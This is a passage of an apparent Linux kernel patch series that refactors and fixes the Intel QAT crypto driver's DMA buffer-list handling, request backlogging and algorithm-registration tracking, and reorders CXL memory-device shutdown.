+ #define ADF_ETR_MAX_RINGS_PER_BANK 16
+-#define ADF_MAX_MSIX_VECTOR_NAME 16
++#define ADF_MAX_MSIX_VECTOR_NAME 48
+ #define ADF_DEVICE_NAME_PREFIX "qat_"
+ 
+ enum adf_accel_capabilities {
+diff --git a/drivers/crypto/qat/qat_common/adf_common_drv.h b/drivers/crypto/qat/qat_common/adf_common_drv.h
+index bff613eec5c4b..d2bc2361cd069 100644
+--- a/drivers/crypto/qat/qat_common/adf_common_drv.h
++++ b/drivers/crypto/qat/qat_common/adf_common_drv.h
+@@ -25,6 +25,7 @@
+ #define ADF_STATUS_AE_STARTED 6
+ #define ADF_STATUS_PF_RUNNING 7
+ #define ADF_STATUS_IRQ_ALLOCATED 8
++#define ADF_STATUS_CRYPTO_ALGS_REGISTERED 9
+ 
+ enum adf_dev_reset_mode {
+ 	ADF_DEV_RESET_ASYNC = 0,
+diff --git a/drivers/crypto/qat/qat_common/adf_init.c b/drivers/crypto/qat/qat_common/adf_init.c
+index d6f3314246179..2e3481270c4ba 100644
+--- a/drivers/crypto/qat/qat_common/adf_init.c
++++ b/drivers/crypto/qat/qat_common/adf_init.c
+@@ -209,6 +209,8 @@ int adf_dev_start(struct adf_accel_dev *accel_dev)
+ 		clear_bit(ADF_STATUS_STARTED, &accel_dev->status);
+ 		return -EFAULT;
+ 	}
++	set_bit(ADF_STATUS_CRYPTO_ALGS_REGISTERED, &accel_dev->status);
++
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(adf_dev_start);
+@@ -237,10 +239,12 @@ void adf_dev_stop(struct adf_accel_dev *accel_dev)
+ 	clear_bit(ADF_STATUS_STARTING, &accel_dev->status);
+ 	clear_bit(ADF_STATUS_STARTED, &accel_dev->status);
+ 
+-	if (!list_empty(&accel_dev->crypto_list)) {
++	if (!list_empty(&accel_dev->crypto_list) &&
++	    test_bit(ADF_STATUS_CRYPTO_ALGS_REGISTERED, &accel_dev->status)) {
+ 		qat_algs_unregister();
+ 		qat_asym_algs_unregister();
+ 	}
++	clear_bit(ADF_STATUS_CRYPTO_ALGS_REGISTERED, &accel_dev->status);
+ 
+ 	list_for_each(list_itr, &service_table) {
+ 		service = list_entry(list_itr, struct service_hndl, list);
+diff --git a/drivers/crypto/qat/qat_common/adf_sysfs.c b/drivers/crypto/qat/qat_common/adf_sysfs.c
+index 3eb6611ab1b11..81b2ecfcc8060 100644
+--- a/drivers/crypto/qat/qat_common/adf_sysfs.c
++++ b/drivers/crypto/qat/qat_common/adf_sysfs.c
+@@ -61,7 +61,9 @@ static ssize_t state_store(struct device *dev, struct device_attribute *attr,
+ 		dev_info(dev, "Starting device qat_dev%d\n", accel_id);
+ 
+ 		ret = adf_dev_up(accel_dev, true);
+-		if (ret < 0) {
++		if (ret == -EALREADY) {
++			break;
++		} else if (ret) {
+ 			dev_err(dev, "Failed to start device qat_dev%d\n",
+ 				accel_id);
+ 			adf_dev_down(accel_dev, true);
+diff --git a/drivers/crypto/qat/qat_common/adf_transport_debug.c b/drivers/crypto/qat/qat_common/adf_transport_debug.c
+index 08bca1c506c0e..e2dd568b87b51 100644
+--- a/drivers/crypto/qat/qat_common/adf_transport_debug.c
++++ b/drivers/crypto/qat/qat_common/adf_transport_debug.c
+@@ -90,7 +90,7 @@ DEFINE_SEQ_ATTRIBUTE(adf_ring_debug);
+ int adf_ring_debugfs_add(struct adf_etr_ring_data *ring, const char *name)
+ {
+ 	struct adf_etr_ring_debug_entry *ring_debug;
+-	char entry_name[8];
++	char entry_name[16];
+ 
+ 	ring_debug = kzalloc(sizeof(*ring_debug), GFP_KERNEL);
+ 	if (!ring_debug)
+@@ -192,7 +192,7 @@ int adf_bank_debugfs_add(struct adf_etr_bank_data *bank)
+ {
+ 	struct adf_accel_dev *accel_dev = bank->accel_dev;
+ 	struct dentry *parent = accel_dev->transport->debug;
+-	char name[8];
++	char name[16];
+ 
+ 	snprintf(name, sizeof(name), "bank_%02d", bank->bank_number);
+ 	bank->bank_debug_dir = debugfs_create_dir(name, parent);
+diff --git a/drivers/crypto/qat/qat_common/qat_algs.c b/drivers/crypto/qat/qat_common/qat_algs.c
+index f56ee4cc5ae8b..b61ada5591586 100644
+--- a/drivers/crypto/qat/qat_common/qat_algs.c
++++ b/drivers/crypto/qat/qat_common/qat_algs.c
+@@ -23,6 +23,7 @@
+ #include "icp_qat_hw.h"
+ #include "icp_qat_fw.h"
+ #include "icp_qat_fw_la.h"
++#include "qat_bl.h"
+ 
+ #define QAT_AES_HW_CONFIG_ENC(alg, mode) \
+ 	ICP_QAT_HW_CIPHER_CONFIG_BUILD(mode, alg, \
+@@ -663,189 +664,6 @@ static int qat_alg_aead_setkey(struct crypto_aead *tfm, const u8 *key,
+ 		return qat_alg_aead_newkey(tfm, key, keylen);
+ }
+ 
+-static void qat_alg_free_bufl(struct qat_crypto_instance *inst,
+-			      struct qat_crypto_request *qat_req)
+-{
+-	struct device *dev = &GET_DEV(inst->accel_dev);
+-	struct qat_alg_buf_list *bl = qat_req->buf.bl;
+-	struct qat_alg_buf_list *blout = qat_req->buf.blout;
+-	dma_addr_t blp = qat_req->buf.blp;
+-	dma_addr_t blpout = qat_req->buf.bloutp;
+-	size_t sz = qat_req->buf.sz;
+-	size_t sz_out = qat_req->buf.sz_out;
+-	int bl_dma_dir;
+-	int i;
+-
+-	bl_dma_dir = blp != blpout ? DMA_TO_DEVICE : DMA_BIDIRECTIONAL;
+-
+-	for (i = 0; i < bl->num_bufs; i++)
+-		dma_unmap_single(dev, bl->bufers[i].addr,
+-				 bl->bufers[i].len, bl_dma_dir);
+-
+-	dma_unmap_single(dev, blp, sz, DMA_TO_DEVICE);
+-
+-	if (!qat_req->buf.sgl_src_valid)
+-		kfree(bl);
+-
+-	if (blp != blpout) {
+-		/* If out of place operation dma unmap only data */
+-		int bufless = blout->num_bufs - blout->num_mapped_bufs;
+-
+-		for (i = bufless; i < blout->num_bufs; i++) {
+-			dma_unmap_single(dev, blout->bufers[i].addr,
+-					 blout->bufers[i].len,
+-					 DMA_FROM_DEVICE);
+-		}
+-		dma_unmap_single(dev, blpout, sz_out, DMA_TO_DEVICE);
+-
+-		if (!qat_req->buf.sgl_dst_valid)
+-			kfree(blout);
+-	}
+-}
+-
+-static int qat_alg_sgl_to_bufl(struct qat_crypto_instance *inst,
+-			       struct scatterlist *sgl,
+-			       struct scatterlist *sglout,
+-			       struct qat_crypto_request *qat_req,
+-			       gfp_t flags)
+-{
+-	struct device *dev = &GET_DEV(inst->accel_dev);
+-	int i, sg_nctr = 0;
+-	int n = sg_nents(sgl);
+-	struct qat_alg_buf_list *bufl;
+-	struct qat_alg_buf_list *buflout = NULL;
+-	dma_addr_t blp = DMA_MAPPING_ERROR;
+-	dma_addr_t bloutp = DMA_MAPPING_ERROR;
+-	struct scatterlist *sg;
+-	size_t sz_out, sz = struct_size(bufl, bufers, n);
+-	int node = dev_to_node(&GET_DEV(inst->accel_dev));
+-	int bufl_dma_dir;
+-
+-	if (unlikely(!n))
+-		return -EINVAL;
+-
+-	qat_req->buf.sgl_src_valid = false;
+-	qat_req->buf.sgl_dst_valid = false;
+-
+-	if (n > QAT_MAX_BUFF_DESC) {
+-		bufl = kzalloc_node(sz, flags, node);
+-		if (unlikely(!bufl))
+-			return -ENOMEM;
+-	} else {
+-		bufl = &qat_req->buf.sgl_src.sgl_hdr;
+-		memset(bufl, 0, sizeof(struct qat_alg_buf_list));
+-		qat_req->buf.sgl_src_valid = true;
+-	}
+-
+-	bufl_dma_dir = sgl != sglout ? DMA_TO_DEVICE : DMA_BIDIRECTIONAL;
+-
+-	for_each_sg(sgl, sg, n, i)
+-		bufl->bufers[i].addr = DMA_MAPPING_ERROR;
+-
+-	for_each_sg(sgl, sg, n, i) {
+-		int y = sg_nctr;
+-
+-		if (!sg->length)
+-			continue;
+-
+-		bufl->bufers[y].addr = dma_map_single(dev, sg_virt(sg),
+-						      sg->length,
+-						      bufl_dma_dir);
+-		bufl->bufers[y].len = sg->length;
+-		if (unlikely(dma_mapping_error(dev, bufl->bufers[y].addr)))
+-			goto err_in;
+-		sg_nctr++;
+-	}
+-	bufl->num_bufs = sg_nctr;
+-	blp = dma_map_single(dev, bufl, sz, DMA_TO_DEVICE);
+-	if (unlikely(dma_mapping_error(dev, blp)))
+-		goto err_in;
+-	qat_req->buf.bl = bufl;
+-	qat_req->buf.blp = blp;
+-	qat_req->buf.sz = sz;
+-	/* Handle out of place operation */
+-	if (sgl != sglout) {
+-		struct qat_alg_buf *bufers;
+-
+-		n = sg_nents(sglout);
+-		sz_out = struct_size(buflout, bufers, n);
+-		sg_nctr = 0;
+-
+-		if (n > QAT_MAX_BUFF_DESC) {
+-			buflout = kzalloc_node(sz_out, flags, node);
+-			if (unlikely(!buflout))
+-				goto err_in;
+-		} else {
+-			buflout = &qat_req->buf.sgl_dst.sgl_hdr;
+-			memset(buflout, 0, sizeof(struct qat_alg_buf_list));
+-			qat_req->buf.sgl_dst_valid = true;
+-		}
+-
+-		bufers = buflout->bufers;
+-		for_each_sg(sglout, sg, n, i)
+-			bufers[i].addr = DMA_MAPPING_ERROR;
+-
+-		for_each_sg(sglout, sg, n, i) {
+-			int y = sg_nctr;
+-
+-			if (!sg->length)
+-				continue;
+-
+-			bufers[y].addr = dma_map_single(dev, sg_virt(sg),
+-							sg->length,
+-							DMA_FROM_DEVICE);
+-			if (unlikely(dma_mapping_error(dev, bufers[y].addr)))
+-				goto err_out;
+-			bufers[y].len = sg->length;
+-			sg_nctr++;
+-		}
+-		buflout->num_bufs = sg_nctr;
+-		buflout->num_mapped_bufs = sg_nctr;
+-		bloutp = dma_map_single(dev, buflout, sz_out, DMA_TO_DEVICE);
+-		if (unlikely(dma_mapping_error(dev, bloutp)))
+-			goto err_out;
+-		qat_req->buf.blout = buflout;
+-		qat_req->buf.bloutp = bloutp;
+-		qat_req->buf.sz_out = sz_out;
+-	} else {
+-		/* Otherwise set the src and dst to the same address */
+-		qat_req->buf.bloutp = qat_req->buf.blp;
+-		qat_req->buf.sz_out = 0;
+-	}
+-	return 0;
+-
+-err_out:
+-	if (!dma_mapping_error(dev, bloutp))
+-		dma_unmap_single(dev, bloutp, sz_out, DMA_TO_DEVICE);
+-
+-	n = sg_nents(sglout);
+-	for (i = 0; i < n; i++)
+-		if (!dma_mapping_error(dev, buflout->bufers[i].addr))
+-			dma_unmap_single(dev, buflout->bufers[i].addr,
+-					 buflout->bufers[i].len,
+-					 DMA_FROM_DEVICE);
+-
+-	if (!qat_req->buf.sgl_dst_valid)
+-		kfree(buflout);
+-
+-err_in:
+-	if (!dma_mapping_error(dev, blp))
+-		dma_unmap_single(dev, blp, sz, DMA_TO_DEVICE);
+-
+-	n = sg_nents(sgl);
+-	for (i = 0; i < n; i++)
+-		if (!dma_mapping_error(dev, bufl->bufers[i].addr))
+-			dma_unmap_single(dev, bufl->bufers[i].addr,
+-					 bufl->bufers[i].len,
+-					 bufl_dma_dir);
+-
+-	if (!qat_req->buf.sgl_src_valid)
+-		kfree(bufl);
+-
+-	dev_err(dev, "Failed to map buf for dma\n");
+-	return -ENOMEM;
+-}
+-
+ static void qat_aead_alg_callback(struct icp_qat_fw_la_resp *qat_resp,
+ 				  struct qat_crypto_request *qat_req)
+ {
+@@ -855,7 +673,7 @@ static void qat_aead_alg_callback(struct icp_qat_fw_la_resp *qat_resp,
+ 	u8 stat_filed = qat_resp->comn_resp.comn_status;
+ 	int res = 0, qat_res = ICP_QAT_FW_COMN_RESP_CRYPTO_STAT_GET(stat_filed);
+ 
+-	qat_alg_free_bufl(inst, qat_req);
++	qat_bl_free_bufl(inst->accel_dev, &qat_req->buf);
+ 	if (unlikely(qat_res != ICP_QAT_FW_COMN_STATUS_FLAG_OK))
+ 		res = -EBADMSG;
+ 	areq->base.complete(&areq->base, res);
+@@ -925,7 +743,7 @@ static void qat_skcipher_alg_callback(struct icp_qat_fw_la_resp *qat_resp,
+ 	u8 stat_filed = qat_resp->comn_resp.comn_status;
+ 	int res = 0, qat_res = ICP_QAT_FW_COMN_RESP_CRYPTO_STAT_GET(stat_filed);
+ 
+-	qat_alg_free_bufl(inst, qat_req);
++	qat_bl_free_bufl(inst->accel_dev, &qat_req->buf);
+ 	if (unlikely(qat_res != ICP_QAT_FW_COMN_STATUS_FLAG_OK))
+ 		res = -EINVAL;
+ 
+@@ -981,7 +799,8 @@ static int qat_alg_aead_dec(struct aead_request *areq)
+ 	if (cipher_len % AES_BLOCK_SIZE != 0)
+ 		return -EINVAL;
+ 
+-	ret = qat_alg_sgl_to_bufl(ctx->inst, areq->src, areq->dst, qat_req, f);
++	ret = qat_bl_sgl_to_bufl(ctx->inst->accel_dev, areq->src, areq->dst,
++				 &qat_req->buf, NULL, f);
+ 	if (unlikely(ret))
+ 		return ret;
+ 
+@@ -1003,7 +822,7 @@ static int qat_alg_aead_dec(struct aead_request *areq)
+ 
+ 	ret = qat_alg_send_sym_message(qat_req, ctx->inst, &areq->base);
+ 	if (ret == -ENOSPC)
+-		qat_alg_free_bufl(ctx->inst, qat_req);
++		qat_bl_free_bufl(ctx->inst->accel_dev, &qat_req->buf);
+ 
+ 	return ret;
+ }
+@@ -1024,7 +843,8 @@ static int qat_alg_aead_enc(struct aead_request *areq)
+ 	if (areq->cryptlen % AES_BLOCK_SIZE != 0)
+ 		return -EINVAL;
+ 
+-	ret = qat_alg_sgl_to_bufl(ctx->inst, areq->src, areq->dst, qat_req, f);
++	ret = qat_bl_sgl_to_bufl(ctx->inst->accel_dev, areq->src, areq->dst,
++				 &qat_req->buf, NULL, f);
+ 	if (unlikely(ret))
+ 		return ret;
+ 
+@@ -1048,7 +868,7 @@ static int qat_alg_aead_enc(struct aead_request *areq)
+ 
+ 	ret = qat_alg_send_sym_message(qat_req, ctx->inst, &areq->base);
+ 	if (ret == -ENOSPC)
+-		qat_alg_free_bufl(ctx->inst, qat_req);
++		qat_bl_free_bufl(ctx->inst->accel_dev, &qat_req->buf);
+ 
+ 	return ret;
+ }
+@@ -1209,7 +1029,8 @@ static int qat_alg_skcipher_encrypt(struct skcipher_request *req)
+ 	if (req->cryptlen == 0)
+ 		return 0;
+ 
+-	ret = qat_alg_sgl_to_bufl(ctx->inst, req->src, req->dst, qat_req, f);
++	ret = qat_bl_sgl_to_bufl(ctx->inst->accel_dev, req->src, req->dst,
++				 &qat_req->buf, NULL, f);
+ 	if (unlikely(ret))
+ 		return ret;
+ 
+@@ -1230,7 +1051,7 @@ static int qat_alg_skcipher_encrypt(struct skcipher_request *req)
+ 
+ 	ret = qat_alg_send_sym_message(qat_req, ctx->inst, &req->base);
+ 	if (ret == -ENOSPC)
+-		qat_alg_free_bufl(ctx->inst, qat_req);
++		qat_bl_free_bufl(ctx->inst->accel_dev, &qat_req->buf);
+ 
+ 	return ret;
+ }
+@@ -1275,7 +1096,8 @@ static int qat_alg_skcipher_decrypt(struct skcipher_request *req)
+ 	if (req->cryptlen == 0)
+ 		return 0;
+ 
+-	ret = qat_alg_sgl_to_bufl(ctx->inst, req->src, req->dst, qat_req, f);
++	ret = qat_bl_sgl_to_bufl(ctx->inst->accel_dev, req->src, req->dst,
++				 &qat_req->buf, NULL, f);
+ 	if (unlikely(ret))
+ 		return ret;
+ 
+@@ -1297,7 +1119,7 @@ static int qat_alg_skcipher_decrypt(struct skcipher_request *req)
+ 
+ 	ret = qat_alg_send_sym_message(qat_req, ctx->inst, &req->base);
+ 	if (ret == -ENOSPC)
+-		qat_alg_free_bufl(ctx->inst, qat_req);
++		qat_bl_free_bufl(ctx->inst->accel_dev, &qat_req->buf);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/crypto/qat/qat_common/qat_algs_send.c b/drivers/crypto/qat/qat_common/qat_algs_send.c
+index ff5b4347f7831..607ed88f4b197 100644
+--- a/drivers/crypto/qat/qat_common/qat_algs_send.c
++++ b/drivers/crypto/qat/qat_common/qat_algs_send.c
+@@ -39,40 +39,44 @@ void qat_alg_send_backlog(struct qat_instance_backlog *backlog)
+ 	spin_unlock_bh(&backlog->lock);
+ }
+ 
+-static void qat_alg_backlog_req(struct qat_alg_req *req,
+-				struct qat_instance_backlog *backlog)
+-{
+-	INIT_LIST_HEAD(&req->list);
+-
+-	spin_lock_bh(&backlog->lock);
+-	list_add_tail(&req->list, &backlog->list);
+-	spin_unlock_bh(&backlog->lock);
+-}
+-
+-static int qat_alg_send_message_maybacklog(struct qat_alg_req *req)
++static bool qat_alg_try_enqueue(struct qat_alg_req *req)
+ {
+ 	struct qat_instance_backlog *backlog = req->backlog;
+ 	struct adf_etr_ring_data *tx_ring = req->tx_ring;
+ 	u32 *fw_req = req->fw_req;
+ 
+-	/* If any request is already backlogged, then add to backlog list */
++	/* Check if any request is already backlogged */
+ 	if (!list_empty(&backlog->list))
+-		goto enqueue;
++		return false;
+ 
+-	/* If ring is nearly full, then add to backlog list */
++	/* Check if ring is nearly full */
+ 	if (adf_ring_nearly_full(tx_ring))
+-		goto enqueue;
++		return false;
+ 
+-	/* If adding request to HW ring fails, then add to backlog list */
++	/* Try to enqueue to HW ring */
+ 	if (adf_send_message(tx_ring, fw_req))
+-		goto enqueue;
++		return false;
+ 
+-	return -EINPROGRESS;
++	return true;
++}
+ 
+-enqueue:
+-	qat_alg_backlog_req(req, backlog);
+ 
+-	return -EBUSY;
++static int qat_alg_send_message_maybacklog(struct qat_alg_req *req)
++{
++	struct qat_instance_backlog *backlog = req->backlog;
++	int ret = -EINPROGRESS;
++
++	if (qat_alg_try_enqueue(req))
++		return ret;
++
++	spin_lock_bh(&backlog->lock);
++	if (!qat_alg_try_enqueue(req)) {
++		list_add_tail(&req->list, &backlog->list);
++		ret = -EBUSY;
++	}
++	spin_unlock_bh(&backlog->lock);
++
++	return ret;
+ }
+ 
+ int qat_alg_send_message(struct qat_alg_req *req)
+diff --git a/drivers/crypto/qat/qat_common/qat_bl.c b/drivers/crypto/qat/qat_common/qat_bl.c
+new file mode 100644
+index 0000000000000..221a4eb610a38
+--- /dev/null
++++ b/drivers/crypto/qat/qat_common/qat_bl.c
+@@ -0,0 +1,224 @@
++// SPDX-License-Identifier: GPL-2.0-only
++/* Copyright(c) 2014 - 2022 Intel Corporation */
++#include <linux/device.h>
++#include <linux/dma-mapping.h>
++#include <linux/pci.h>
++#include <linux/scatterlist.h>
++#include <linux/slab.h>
++#include <linux/types.h>
++#include "adf_accel_devices.h"
++#include "qat_bl.h"
++#include "qat_crypto.h"
++
++void qat_bl_free_bufl(struct adf_accel_dev *accel_dev,
++		      struct qat_request_buffs *buf)
++{
++	struct device *dev = &GET_DEV(accel_dev);
++	struct qat_alg_buf_list *bl = buf->bl;
++	struct qat_alg_buf_list *blout = buf->blout;
++	dma_addr_t blp = buf->blp;
++	dma_addr_t blpout = buf->bloutp;
++	size_t sz = buf->sz;
++	size_t sz_out = buf->sz_out;
++	int bl_dma_dir;
++	int i;
++
++	bl_dma_dir = blp != blpout ? DMA_TO_DEVICE : DMA_BIDIRECTIONAL;
++
++	for (i = 0; i < bl->num_bufs; i++)
++		dma_unmap_single(dev, bl->bufers[i].addr,
++				 bl->bufers[i].len, bl_dma_dir);
++
++	dma_unmap_single(dev, blp, sz, DMA_TO_DEVICE);
++
++	if (!buf->sgl_src_valid)
++		kfree(bl);
++
++	if (blp != blpout) {
++		for (i = 0; i < blout->num_mapped_bufs; i++) {
++			dma_unmap_single(dev, blout->bufers[i].addr,
++					 blout->bufers[i].len,
++					 DMA_FROM_DEVICE);
++		}
++		dma_unmap_single(dev, blpout, sz_out, DMA_TO_DEVICE);
++
++		if (!buf->sgl_dst_valid)
++			kfree(blout);
++	}
++}
++
++static int __qat_bl_sgl_to_bufl(struct adf_accel_dev *accel_dev,
++				struct scatterlist *sgl,
++				struct scatterlist *sglout,
++				struct qat_request_buffs *buf,
++				dma_addr_t extra_dst_buff,
++				size_t sz_extra_dst_buff,
++				gfp_t flags)
++{
++	struct device *dev = &GET_DEV(accel_dev);
++	int i, sg_nctr = 0;
++	int n = sg_nents(sgl);
++	struct qat_alg_buf_list *bufl;
++	struct qat_alg_buf_list *buflout = NULL;
++	dma_addr_t blp = DMA_MAPPING_ERROR;
++	dma_addr_t bloutp = DMA_MAPPING_ERROR;
++	struct scatterlist *sg;
++	size_t sz_out, sz = struct_size(bufl, bufers, n);
++	int node = dev_to_node(&GET_DEV(accel_dev));
++	int bufl_dma_dir;
++
++	if (unlikely(!n))
++		return -EINVAL;
++
++	buf->sgl_src_valid = false;
++	buf->sgl_dst_valid = false;
++
++	if (n > QAT_MAX_BUFF_DESC) {
++		bufl = kzalloc_node(sz, flags, node);
++		if (unlikely(!bufl))
++			return -ENOMEM;
++	} else {
++		bufl = &buf->sgl_src.sgl_hdr;
++		memset(bufl, 0, sizeof(struct qat_alg_buf_list));
++		buf->sgl_src_valid = true;
++	}
++
++	bufl_dma_dir = sgl != sglout ? DMA_TO_DEVICE : DMA_BIDIRECTIONAL;
++
++	for (i = 0; i < n; i++)
++		bufl->bufers[i].addr = DMA_MAPPING_ERROR;
++
++	for_each_sg(sgl, sg, n, i) {
++		int y = sg_nctr;
++
++		if (!sg->length)
++			continue;
++
++		bufl->bufers[y].addr = dma_map_single(dev, sg_virt(sg),
++						      sg->length,
++						      bufl_dma_dir);
++		bufl->bufers[y].len = sg->length;
++		if (unlikely(dma_mapping_error(dev, bufl->bufers[y].addr)))
++			goto err_in;
++		sg_nctr++;
++	}
++	bufl->num_bufs = sg_nctr;
++	blp = dma_map_single(dev, bufl, sz, DMA_TO_DEVICE);
++	if (unlikely(dma_mapping_error(dev, blp)))
++		goto err_in;
++	buf->bl = bufl;
++	buf->blp = blp;
++	buf->sz = sz;
++	/* Handle out of place operation */
++	if (sgl != sglout) {
++		struct qat_alg_buf *bufers;
++		int extra_buff = extra_dst_buff ? 1 : 0;
++		int n_sglout = sg_nents(sglout);
++
++		n = n_sglout + extra_buff;
++		sz_out = struct_size(buflout, bufers, n);
++		sg_nctr = 0;
++
++		if (n > QAT_MAX_BUFF_DESC) {
++			buflout = kzalloc_node(sz_out, flags, node);
++			if (unlikely(!buflout))
++				goto err_in;
++		} else {
++			buflout = &buf->sgl_dst.sgl_hdr;
++			memset(buflout, 0, sizeof(struct qat_alg_buf_list));
++			buf->sgl_dst_valid = true;
++		}
++
++		bufers = buflout->bufers;
++		for (i = 0; i < n; i++)
++			bufers[i].addr = DMA_MAPPING_ERROR;
++
++		for_each_sg(sglout, sg, n_sglout, i) {
++			int y = sg_nctr;
++
++			if (!sg->length)
++				continue;
++
++			bufers[y].addr = dma_map_single(dev, sg_virt(sg),
++							sg->length,
++							DMA_FROM_DEVICE);
++			if (unlikely(dma_mapping_error(dev, bufers[y].addr)))
++				goto err_out;
++			bufers[y].len = sg->length;
++			sg_nctr++;
++		}
++		if (extra_buff) {
++			bufers[sg_nctr].addr = extra_dst_buff;
++			bufers[sg_nctr].len = sz_extra_dst_buff;
++		}
++
++		buflout->num_bufs = sg_nctr;
++		buflout->num_bufs += extra_buff;
++		buflout->num_mapped_bufs = sg_nctr;
++		bloutp = dma_map_single(dev, buflout, sz_out, DMA_TO_DEVICE);
++		if (unlikely(dma_mapping_error(dev, bloutp)))
++			goto err_out;
++		buf->blout = buflout;
++		buf->bloutp = bloutp;
++		buf->sz_out = sz_out;
++	} else {
++		/* Otherwise set the src and dst to the same address */
++		buf->bloutp = buf->blp;
++		buf->sz_out = 0;
++	}
++	return 0;
++
++err_out:
++	if (!dma_mapping_error(dev, bloutp))
++		dma_unmap_single(dev, bloutp, sz_out, DMA_TO_DEVICE);
++
++	n = sg_nents(sglout);
++	for (i = 0; i < n; i++) {
++		if (buflout->bufers[i].addr == extra_dst_buff)
++			break;
++		if (!dma_mapping_error(dev, buflout->bufers[i].addr))
++			dma_unmap_single(dev, buflout->bufers[i].addr,
++					 buflout->bufers[i].len,
++					 DMA_FROM_DEVICE);
++	}
++
++	if (!buf->sgl_dst_valid)
++		kfree(buflout);
++
++err_in:
++	if (!dma_mapping_error(dev, blp))
++		dma_unmap_single(dev, blp, sz, DMA_TO_DEVICE);
++
++	n = sg_nents(sgl);
++	for (i = 0; i < n; i++)
++		if (!dma_mapping_error(dev, bufl->bufers[i].addr))
++			dma_unmap_single(dev, bufl->bufers[i].addr,
++					 bufl->bufers[i].len,
++					 bufl_dma_dir);
++
++	if (!buf->sgl_src_valid)
++		kfree(bufl);
++
++	dev_err(dev, "Failed to map buf for dma\n");
++	return -ENOMEM;
++}
++
++int qat_bl_sgl_to_bufl(struct adf_accel_dev *accel_dev,
++		       struct scatterlist *sgl,
++		       struct scatterlist *sglout,
++		       struct qat_request_buffs *buf,
++		       struct qat_sgl_to_bufl_params *params,
++		       gfp_t flags)
++{
++	dma_addr_t extra_dst_buff = 0;
++	size_t sz_extra_dst_buff = 0;
++
++	if (params) {
++		extra_dst_buff = params->extra_dst_buff;
++		sz_extra_dst_buff = params->sz_extra_dst_buff;
++	}
++
++	return __qat_bl_sgl_to_bufl(accel_dev, sgl, sglout, buf,
++				    extra_dst_buff, sz_extra_dst_buff,
++				    flags);
++}
+diff --git a/drivers/crypto/qat/qat_common/qat_bl.h b/drivers/crypto/qat/qat_common/qat_bl.h
+new file mode 100644
+index 0000000000000..0c174fee9e645
+--- /dev/null
++++ b/drivers/crypto/qat/qat_common/qat_bl.h
+@@ -0,0 +1,55 @@
++/* SPDX-License-Identifier: GPL-2.0-only */
++/* Copyright(c) 2014 - 2022 Intel Corporation */
++#ifndef QAT_BL_H
++#define QAT_BL_H
++#include <linux/scatterlist.h>
++#include <linux/types.h>
++
++#define QAT_MAX_BUFF_DESC	4
++
++struct qat_alg_buf {
++	u32 len;
++	u32 resrvd;
++	u64 addr;
++} __packed;
++
++struct qat_alg_buf_list {
++	u64 resrvd;
++	u32 num_bufs;
++	u32 num_mapped_bufs;
++	struct qat_alg_buf bufers[];
++} __packed;
++
++struct qat_alg_fixed_buf_list {
++	struct qat_alg_buf_list sgl_hdr;
++	struct qat_alg_buf descriptors[QAT_MAX_BUFF_DESC];
++} __packed __aligned(64);
++
++struct qat_request_buffs {
++	struct qat_alg_buf_list *bl;
++	dma_addr_t blp;
++	struct qat_alg_buf_list *blout;
++	dma_addr_t bloutp;
++	size_t sz;
++	size_t sz_out;
++	bool sgl_src_valid;
++	bool sgl_dst_valid;
++	struct qat_alg_fixed_buf_list sgl_src;
++	struct qat_alg_fixed_buf_list sgl_dst;
++};
++
++struct qat_sgl_to_bufl_params {
++	dma_addr_t extra_dst_buff;
++	size_t sz_extra_dst_buff;
++};
++
++void qat_bl_free_bufl(struct adf_accel_dev *accel_dev,
++		      struct qat_request_buffs *buf);
++int qat_bl_sgl_to_bufl(struct adf_accel_dev *accel_dev,
++		       struct scatterlist *sgl,
++		       struct scatterlist *sglout,
++		       struct qat_request_buffs *buf,
++		       struct qat_sgl_to_bufl_params *params,
++		       gfp_t flags);
++
++#endif
+diff --git a/drivers/crypto/qat/qat_common/qat_crypto.h b/drivers/crypto/qat/qat_common/qat_crypto.h
+index df3c738ce323a..bb116357a5684 100644
+--- a/drivers/crypto/qat/qat_common/qat_crypto.h
++++ b/drivers/crypto/qat/qat_common/qat_crypto.h
+@@ -8,6 +8,7 @@
+ #include <linux/slab.h>
+ #include "adf_accel_devices.h"
+ #include "icp_qat_fw_la.h"
++#include "qat_bl.h"
+ 
+ struct qat_instance_backlog {
+ 	struct list_head list;
+@@ -35,39 +36,6 @@ struct qat_crypto_instance {
+ 	struct qat_instance_backlog backlog;
+ };
+ 
+-#define QAT_MAX_BUFF_DESC	4
+-
+-struct qat_alg_buf {
+-	u32 len;
+-	u32 resrvd;
+-	u64 addr;
+-} __packed;
+-
+-struct qat_alg_buf_list {
+-	u64 resrvd;
+-	u32 num_bufs;
+-	u32 num_mapped_bufs;
+-	struct qat_alg_buf bufers[];
+-} __packed;
+-
+-struct qat_alg_fixed_buf_list {
+-	struct qat_alg_buf_list sgl_hdr;
+-	struct qat_alg_buf descriptors[QAT_MAX_BUFF_DESC];
+-} __packed __aligned(64);
+-
+-struct qat_crypto_request_buffs {
+-	struct qat_alg_buf_list *bl;
+-	dma_addr_t blp;
+-	struct qat_alg_buf_list *blout;
+-	dma_addr_t bloutp;
+-	size_t sz;
+-	size_t sz_out;
+-	bool sgl_src_valid;
+-	bool sgl_dst_valid;
+-	struct qat_alg_fixed_buf_list sgl_src;
+-	struct qat_alg_fixed_buf_list sgl_dst;
+-};
+-
+ struct qat_crypto_request;
+ 
+ struct qat_crypto_request {
+@@ -80,7 +48,7 @@ struct qat_crypto_request {
+ 		struct aead_request *aead_req;
+ 		struct skcipher_request *skcipher_req;
+ 	};
+-	struct qat_crypto_request_buffs buf;
++	struct qat_request_buffs buf;
+ 	void (*cb)(struct icp_qat_fw_la_resp *resp,
+ 		   struct qat_crypto_request *req);
+ 	union {
+diff --git a/drivers/cxl/core/memdev.c b/drivers/cxl/core/memdev.c
+index 20ce488a77540..03cf99cce7047 100644
+--- a/drivers/cxl/core/memdev.c
++++ b/drivers/cxl/core/memdev.c
+@@ -214,8 +214,8 @@ static void cxl_memdev_unregister(void *_cxlmd)
+ 	struct cxl_memdev *cxlmd = _cxlmd;
+ 	struct device *dev = &cxlmd->dev;
+ 
+-	cxl_memdev_shutdown(dev);
+ 	cdev_device_del(&cxlmd->cdev, dev);
++	cxl_memdev_shutdown(dev);
+ 	put_device(dev);
+ }
+ 
+diff --git a/drivers/devfreq/event/rockchip-dfi.c b/drivers/devfreq/event/rockchip-dfi.c
+index 39ac069cabc75..74893c06aa087 100644
+--- a/drivers/devfreq/event/rockchip-dfi.c
++++ b/drivers/devfreq/event/rockchip-dfi.c
